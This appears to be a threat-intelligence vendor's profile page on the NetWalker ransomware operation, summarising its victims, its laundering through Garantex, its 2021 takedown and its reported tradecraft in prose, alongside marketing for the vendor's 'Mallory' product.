NetWalker
NetWalker is a ransomware threat actor and ransomware-as-a-service (RaaS) operation active against organizations in the US, Australia, and Western Europe. The content states the actor targeted a diverse set of victims and that reporting indicated a shift toward larger enterprises rather than individuals. NetWalker is also referenced as a ransomware variant whose proceeds were laundered through services such as Garantex, and U.S. law enforcement targeted the operation in January 2021, confiscating approximately $500,000 in digital assets. Based on Sophos reporting cited in the content, NetWalker operators used a broad toolset composed of legitimate remote administration software and publicly available offensive tools, including TeamViewer, AnyDesk, Sysinternals PsTools, SoftPerfect Network Scanner, Mimikatz and variants such as Mimidogz and Mimikittenz, Windows Credential Editor, and NLBrute. Initial access was not definitively established, but the content cites likely exploitation of known vulnerabilities in outdated Tomcat or WebLogic servers and/or weak RDP passwords. Post-compromise activity included reconnaissance, credential theft, brute forcing, lateral movement over SMB, use of PsExec and certutil for remote execution and payload delivery, and use of a Domain Admin account named SQLSVC in at least one case. The content states NetWalker was delivered via an obfuscated reflective PowerShell loader that decoded and decrypted embedded payloads in memory and deleted Shadow Volumes to inhibit recovery. Each victim typically received a unique NetWalker DLL build, with differences often centered on encrypted resource blobs. The content also notes that NetWalker can delete infected systems' Shadow Volumes to prevent recovery. NetWalker is mentioned in the content as having possible ecosystem overlap or partnerships with other RaaS operations through affiliates, including UNC2628, which was assessed to have partnered with REvil and NetWalker. The content also references the arrest of an affiliate tied to the NetWalker ransomware program and its subsequent demise in early 2021.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Recent activity
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware operation whose proceeds were processed/laundered via Garantex per U.S. Treasury.
Referenced as a ransomware threat group whose proceeds were laundered via the Garantex cryptocurrency exchange.
Named ransomware operation noted as reducing activity after law-enforcement raids.
Ransomware program discussed in relation to the arrest of an affiliate and the administrator Bugatti; cited by Wazawaka as an example of operational failure and shutdown.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.